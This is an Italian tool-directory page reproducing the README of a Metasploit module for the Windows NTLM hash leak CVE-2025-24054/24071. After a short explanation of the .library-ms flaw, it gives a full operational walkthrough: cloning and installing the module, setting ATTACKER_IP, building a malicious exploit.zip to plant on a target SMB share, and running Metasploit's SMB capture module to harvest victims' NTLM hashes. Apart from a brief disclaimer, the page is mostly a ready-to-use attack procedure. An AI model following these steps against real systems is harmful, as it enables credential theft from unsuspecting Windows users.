Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24054-24071---Metasploit-Module — Modulo Metasploit per sfruttare CVE-2025-24054 (ex 24071). Exploit di filtraggio NTLM integrato in Metasploit per vettori di attacco basati su librerie di Windows. | Kitploit
Strumenti/GitHubGitHub/securitylayer404/cve-2025-24054-24071---metasploit-module
Framework di ExploitGenerazione di PayloadExploitPenetration TestingApprendimento e FormazioneRed Teaming
GitHubsecuritylayer404/cve-2025-24054-24071---metasploit-module

CVE-2025-24054-24071---Metasploit-Module

Modulo Metasploit per sfruttare CVE-2025-24054 (ex 24071). Exploit di filtraggio NTLM integrato in Metasploit per vettori di attacco basati su librerie di Windows.

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-24054/24071 - Modulo Metasploit

Panoramica

La vulnerabilità si verifica durante il processo di estrazione di un file .zip. Interagendo con un file .library-ms appositamente progettato, Esplora risorse di Windows elabora lo schema XML interno e avvia automaticamente una richiesta di autenticazione SMB verso un percorso remoto controllato dall'attaccante.

Questo comportamento consente l'esfiltrazione dell'hash NTLM dell'utente senza richiedere ulteriori interazioni oltre alla decompressione del file. Per una prova di concetto ti consiglio di visitare il seguente link: Fluffy - HTB.

⚠️ Nota critica:

Sebbene originariamente questa vulnerabilità sia stata divulgata come CVE-2025-24071, attualmente viene tracciata ufficialmente come CVE-2025-24054.

📌 Installazione

Clonare il repository:

root@kitploit:~
❯ git clone https://github.com/SecurityLayer404/CVE-2025-24054-24071---Metasploit-Module.git
❯ cd CVE-2025-24071

Copiare il modulo nella directory di Metasploit:

root@kitploit:~
❯ cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Se la directory non esiste, creala con:

root@kitploit:~
❯ mkdir -p ~/.msf4/modules/auxiliary/server/

Quindi copia nuovamente il modulo.

📌 Uso

Avviare Metasploit e caricare il modulo:

root@kitploit:~
❯ msfconsole -q
❯ use auxiliary/server/ntlm_hash_leak

Se il modulo è stato caricato correttamente, potrai vedere le opzioni per configurarlo:

root@kitploit:~
❯ show options

Module options (auxiliary/server/ntlm_hash_leak):

   Nome                Impostazione Corrente       Richiesto   Descrizione
   ----                ---------------             --------    -----------
   ATTACKER_IP                                    sì          IP dell'attaccante (dove esegue Responder/Impacket)
   FILENAME            exploit.zip                sì          Il nome del file ZIP
   LIBRARY_NAME        documents.library-ms       sì          Nome del file .library-ms
   SHARE_NAME          risorsa                    sì          Nome della risorsa condivisa fittizia

Configura il modulo ed esegui:

root@kitploit:~
❯ set ATTACKER_IP 0.0.0.0  # Sostituisci con il tuo IP attaccante
❯ set FILENAME exploit.zip  # Nome del payload che caricherai sull'SMB (macchina target)
❯ set LIBRARY_NAME malicious.library-ms  # Nome del file .library-ms
❯ set SHARE_NAME it_shared  # Nome della risorsa SMB
❯ run

Output: il modulo genera un file .zip che deve essere caricato sul server SMB target per la successiva esecuzione da parte della vittima:

root@kitploit:~
[+] exploit.zip stored at /home/user/.msf4/local/exploit.zip
[+] Archivo guardado en: /home/user/.msf4/local/exploit.zip
[*] Auxiliary module execution completed

Infine, utilizza il modulo di cattura SMB di Metasploit per ricevere gli hash NTLM:

root@kitploit:~
❯ use auxiliary/server/capture/smb
❯ set SRVHOST 0.0.0.0  # Sostituisci con il tuo IP attaccante
❯ run

Se hai problemi ad avviare il server SMB da Metasploit:

  • Esegui msfconsole come root
  • Assicurati che il file ntlm_hash_leak.rb abbia i permessi adeguati per essere accessibile da root

⚠️ Avvertenza

Questo modulo è stato sviluppato esclusivamente a scopo educativo e per test autorizzati. L'uso non autorizzato di questo tipo di strumenti potrebbe essere illegale.

🕷 Autore

Security Layer

Scarica lo strumento